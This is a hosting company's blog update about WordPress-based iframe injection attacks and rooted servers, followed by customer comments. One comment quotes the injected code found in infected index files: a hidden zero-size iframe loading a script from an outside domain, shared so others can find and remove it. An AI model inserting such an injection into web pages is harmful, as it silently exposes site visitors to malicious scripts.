Hi Everyone,
Mike and I just wanted to share with you where we are at relative to the last of the iframe attacks. We are rebuilding new servers now because it looks like some of the servers were what’s called “rooted”.
Which means once they got in through a insecure wordpress blog, they were able to get full control of the server. The only fix for that is to move people to a brand new server.
Alot of people are asking if we take all security precautions and we do like running php suexec, mod security rules some ssh rules etc. WE RUN ALL that and more 😀
The unfortunate thing is, one person can have one blog that is insecure and they get access to the whole server. I do have a character flaw where I am too nice.. watch the blog you will see what I mean.
If you have any concerns please post your comments on the blog and I will be personally answering them for you. If you want to see how Iframe hacks affect many data centers (not just ours) please visit google by clicking here and here
–Joel Therien
President
GoGVO.com
Hi Joel & Mike, just to let you know I do not have a wordprss blog up and running. I will, but not right now. I need more info training on how it’s done. Until then I’m in limbo. fyi
Thanks for all your doing to get this resolved. Hats off you yah.
Chuck Johnson
Thanks Joel and Mike ,
Your doing a great service for all of us. Its a shame someone likes to play games with… no regard for anyone else. Talk soon.
God_bless you 🙂
How can we tell if our site has been compromised? Could it be compromised and I don’t know it, like behind the scenes. Thank you for all you efforts,
Ruth
Yeah but what about 777 permissions being allowed? It would seem if that hole was closed they could not get to other WP Blogs! Also Joel after three days now I am still waiting for that phone call…
If you want people to listen to this blog post I think you’ll have to make it downloadable.
I have a downstream speed of 7.5-10 Mbit/s and I just give up on this one for the moment.
YouTube videos are streaming with no problem, even when I start them in parallell with trying to watch your video, so the problem is not on my side.
As it is now your video offers more or less 1-2 words at a time between the bufferings.
Oscar Toft
Hi Guys
One thing I will say is that you guys do not try to hide anything even when you are at fault.
You say that 10 servers are affected will you notify everyone who has a site on one of those servers?
Do all your clients need to change all their user names and passwords?
Richard
Hi Guys
I know that you are doing your best to sort this wp mess out, but as i use my blog a lot to promote my business, mit’s very frustrating when it keeps going down. I know there are people out there without a life that likes messing up other people’s life, it’s just unfortunate but i hope it can be sorted soon.
Many thanks Guys
Ken
Awesome Guys thanks for the update.
GVO Rules.
****iframe name=”StatPage” src=”http://million-one.net/script.***php” width=5 height=5 style=”display:none”>.
**** added these in to the link found in all of my index files
Look for them and delete it
Hi Joel & Mike
Thanks for the update. I’ve changed all cpanel/ftp logins. I also changed my main Kiosk login but, much to my surprise, your system emailed me my password in plain text! I mentioned this in a ticket to your tech guys but can you check it’s been dealt
with? Also, you often include Kiosk/GVO login details with promo emails also in plain text, could you stop doing this please.
Finally, do you provide secure FTP? All the WP security guys advise secure FTP.
Thanks guys
John
Guys… we ALL can not THANK YOU enough for your COUNTLESS hours and sleepless nights for keeping it ALL together for US!
Your dedication to your clients is like no-other in the space.
THANK YOU … for all your help!
Mark Call
You guys deserve a huge ATTABOY for attacking this problem aggressively. Could not have come at a worse time for sure but the whole of GVO and their clients will be much better off once it is put behind us.
One thing we know in life is that you can’t make everyone happy no matter how hard you try. Do the right thing for the vast majority and sleep well at night.
Regards,
Mike Silva
Proud member of TeamYeager
Just wanted to express my level of gratitude for you guys exercising total transparency. It’ really refreshing to hear you call it how it is… Thanks for sharing and for all you are doing..
Makes it a great community to be a part of 🙂
Thanks Joel & Mike for the explanation. I’ve updated my index.php pages more than once and it was beginning be become extremely bothersome. I’m glad you guys are on your game and working hard at coming up with a solution.
Thank you for the updates.
A suggestion, I visited wordpress to update. They had two suggestions, the first was to backup my WP website and the second was to have my webhost to provide assistance in so doing. SO, would you please have someone provide said assistance via an e-mail? And maybe in the future, when you send out a warning, instead of 3 proofs that a fire is hot, you send out a help file on how to put out the fire? You blog is cutting out, buffering, so I’ll listen to it later. Thanks again. Earl
Such hacker attacks should be classified as terrorism and treated as such. It is more devastating on the economy than physical attacks on buildings and people.
This iframe infection has devastated a week of my business life and productivity and, of course, many others. And hosting clients that simply can’t understand the logic behind it all.
Your obvious concerns and hard work – we can only imagine how much – is really appreciated.
But a hard line is needed, as you mentioned. Don’t stop being your cheerful selves but “business is business” and we would have been better off with all affected servers disconnected, taken offline, and ALL websites with WP blogs disabled, then moving all other sites to new servers and re-established. The WP sites server(s) then reconnected out of the array with “x” days or hours to be updated or be removed from access. That would have forced them to contact GVO for support because their sites were down. Too many websites were inconvenienced, out of business because of no fault of their own and didn’t even have WP installed in their accounts.
Don’t know if all that was doable, and hindsight is always more clearer after lesson learned from experience..
Just received your mail mentioning the move of EasyVideoProducer.com to a dedicated fiber optic line.
Great news!
Let’s hope it’ll do the trick.
Oscar Toft
Joel and Mikey P,
Once again your Honesty and Integrity speak volumes. I’m so glad to be on board w/ GVO and the 2 of you.
Thanks for the update.
Unrelated topic: The streaming on your vids is horrible. Don’t know if this is a problem others are experiencing but since the very beginning your videos have been choppy and broken up.
I don’t generally have this problem with other sites and it makes it a pain to watch your stuff.
GARRY
Thank you for all your great work. For those who run wordpress is there a way to be fully secured?
Hello! Joel and Mike, I have brought in to the system of hosting Titanium and I wanted to know if it might continue with the services of the hosting. My question is I can use it from Costa Rica for in this living country, in addition to the commission offers for the hosting promotes TITANIUM. Thank you I wait for his answer.
Are you notifying those sites that might have been the culprits – I am not too technical on doing things the right way? I would not feel bad if I was told I needed to change something.
I am curious – if any of this is password relate, how secure are password managers – like Roboform or the one in the Firefox browser. I know I have a multitude of passwords to try and remember or change.
Also, it might help if you sent out a general email whenever WordPress is updated. I know there is a message when logging into a blog but I don’t do that on a daily basis.
Thanks guys.
Hey Guys,
Thank you for all your efforts to keep us safe and secure.
Nick
Thanks Joel and Mike, Informative and understandable!
I for one am very happy you never deleted affected blogs! So many hours of work and S.E.O. Results would have been wiped away and lost!
Good work guys! very impressed at the speedy handling of this issue. I was up and running with my wrdpr blogs updated as well last weekend, after really only being down less than 2 days.
Also,many thanks to your tech guys in the support dept. They were diligent at keeping me updated to what was going on.
darren
Joel, Mike and the rest of the team many thanks for the hard work and even more important: keeping us updated.
This joker is not only keeping you guys busy but also costing every one of us (and our clients!) a lot of money and wasted hours.
People who use WP shouldn’t rely on their webhost to tell them a new version is available, but instead subscribe to the WP RSS feed to get the latest news:
http://wordpress.org/development/category/releases/feed/
or just visit the page once a week or so:
http://wordpress.org/development/category/releases/
More info on how to secure your blog can be found here:
http://wordpress.org/development/2009/09/keep-wordpress-secure/
or visit the security pages of WP:
http://wordpress.org/development/category/security/
One way to “hide” your blog is described here:
http://codex.wordpress.org/Giving_WordPress_Its_Own_Directory
Thanks again guys and keep up the good work!
Victor
I had a problem a little while ago and wondered if you would like to read the post I published a few days ago, read it thoroughly, it may be helpful.
http://www.dennisbrooksonline.com/140/warning-your-ftp-client-could-harm-your-website/
Hi Guys
A couple of places to get helpfull info for anyone struggling to secure WordPress.
Reasonably simple guide ($37):
http://www.bloglockdown.com
(straight link – not affiliate. I don’t make money out of pain!)
For the techies out there:
http://codex.wordpress.org/Hardening_WordPress
I hope they help
John
I never received an email notification on this blog update. I only found out about the WP thing on gvoacademy this morning. Why am I not receiving the updates?
Appreciate the hard word and honesty guys!
Videos are SCREAMING FAST NOW!! Woohoo! GVO ROCKS!
hi Joel my wordpress blog was comprimised by this hack and it is very dissapointing to see an empty website when you consider all the time and effort it takes to run a blog.but thanks to your excellent tech team you had it up and running again within a few days excellent work thanks
Mike